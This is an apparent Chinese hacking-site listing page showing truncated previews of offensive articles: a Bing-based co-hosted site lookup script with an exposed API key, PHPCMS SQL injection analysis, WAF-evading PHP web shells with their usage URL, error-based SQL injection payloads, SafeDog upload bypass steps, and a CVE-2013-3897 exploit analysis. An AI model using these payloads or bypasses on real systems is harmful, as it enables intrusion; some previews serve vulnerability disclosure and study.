• 旁注查询脚本(python)

    旁注查询脚本(python)
    # coding=utf-8 #author: 小续/Joseph       import urllib import urllib2 import base64 import re import sys #填写供可以使用的key AccountKey='OP8/b5S8imIbXfU1yOYpLbL7tcEgjJ/RJAJjJkTcrJo' top=1000 skip=0 format='json' def BingSearch(query):     payload={}     payload['$top']=top     payload['$skip']=skip     payload['$format']=format     pay...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:2,786次 |
  • PHPCMS用户登陆SQL注入漏洞分析

    PHPCMS用户登陆SQL注入漏洞分析
    文章为转载。 0x00 简述 之前manning在调漏洞的时候,突然发现正常登陆不上去了,当时帮忙跟了下phpcms的登陆流程。之后感觉这个流程貌似有些问题,就仔细看了下,没想到真是一个0day~~ 0x01 漏洞原理 我们先直接看这个漏洞最根源的地方,phpsso/index.php文件所有的操作都存在严重的注入问题,这个类文件的构造函数最先调用它的父构造函数,通过auth_key来解析POST传入的data内容,解析后d...阅读全文
    作者:unhonker | 分类:技术文章, 漏洞公布 | 被撸:4,790次 | 标签:
  • 过狗过盾无特征无动态函数PHP一句话

    过狗过盾无特征无动态函数PHP一句话
    转自90sec@phithon 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等) 原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html 所有一句话使用方法基本都是: http:// target/shell.php?e=assert 密码pass 分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:3,101次 | 标签:
  • 抛开select利用insert,update和delete注入

    抛开select利用insert,update和delete注入
    转载来的 INSERT INTO users (id, username, password) VALUES (1,'Olivia' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or '', 'Nervo'); ERROR 1060 (42S21): Duplicate column...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:16,602次 | 标签:
  • 绕过安全狗上传[3.3 08722]

    绕过安全狗上传[3.3 08722]
    ########################################## # Title :绕过安全狗上传[3.3 08722] # Team :08 Security Team # Author :08安全团队 # 首发 : 08安全团队 ####################################### 这次过狗上传思路和之前我们公布的办法类似。看图。 1.确定安全狗版本以及上传拦截功能开启 2.使用Burp截获POST请求并修改请求包 3.修改上传文件的后缀,新加 ← ,也就是输...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:10,118次 | 标签:
  • Layer子域名挖掘机

    Layer子域名挖掘机
    使用说明: 如果要使用自定义字典,请把字典文件命名为dic,放到跟程序同目录下,程序会自动加载字典。 如果没有自定义字典,程序会自动使用内置字典,内置字典总共两万多条数据,内容包括了常用子域名,以及3000+常用单词和1-3位所有字母。 如果要爆破二级以下域名,可以直接填入要爆破的子域名,程序会自动拼接下一级子域。比如填入hi.baidu.com,程序会爆破 .hi.baidu.com下面的域。 程...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:3,625次 |
  • CVE-2013-3897样本分析学习笔记

    CVE-2013-3897样本分析学习笔记
    之前,看到FireEye上的CVE-2013-3893分析,看利用方式比较类似,以为是同一个,分析学习下,发现导致问题的对象不一致,也没有利用ms-help加载office的hxdl构造ROP,后来在BinVul论坛上看到有人发了该样本,才知道是CVE-2013-3897。不正确地方还请扶正。 1. 概述   该样本攻击对象为韩国和日本的WinXP IE8用户,利用了IE8的CDisplayPointer对象的一个Use-After-Free漏洞,利用DEPS He...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:5,768次 | 标签:
  • [原创首发]绕过网站安全狗3.1 上传

    [原创首发]绕过网站安全狗3.1 上传
    首发自 08安全团队(www.08sec.com) 此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103 ps:此方法已经提交到安全狗安全应急响应中心 绕过网站安全狗 V3.1 06103办法稍后会继续公布出来,请关注我们的消息 www.08sec.com 测试环境:windows 2003 + iis 6.0 测试步骤: 1.确认安全狗功能正常以及版本 2.使用Burp截取上传后进行改包,将后缀改为 08sec.php. 3.审查测试结...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:4,530次 | 标签:
  • Penetration Test On SafeDog【突破安全狗】

    Penetration Test On SafeDog【突破安全狗】
    0x00 安全狗之菜刀的突破 #原理: BAD: caidao -> safedog -X-> backdoor GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao 菜刀发送的数据是会被安全狗拦截,因为菜刀的发的数据已被纳入安全狗的特征码内 但是如果我们在菜刀与狗之间放一个加密数据的脚本,将原数据进行修改加密,然后再通过脚本发送出去 类似为一个代理,发出去的数据流到安全狗,因为没有特征码了,...阅读全文
    作者:unhonker | 分类:技术文章 | 被撸:6,336次 | 标签:,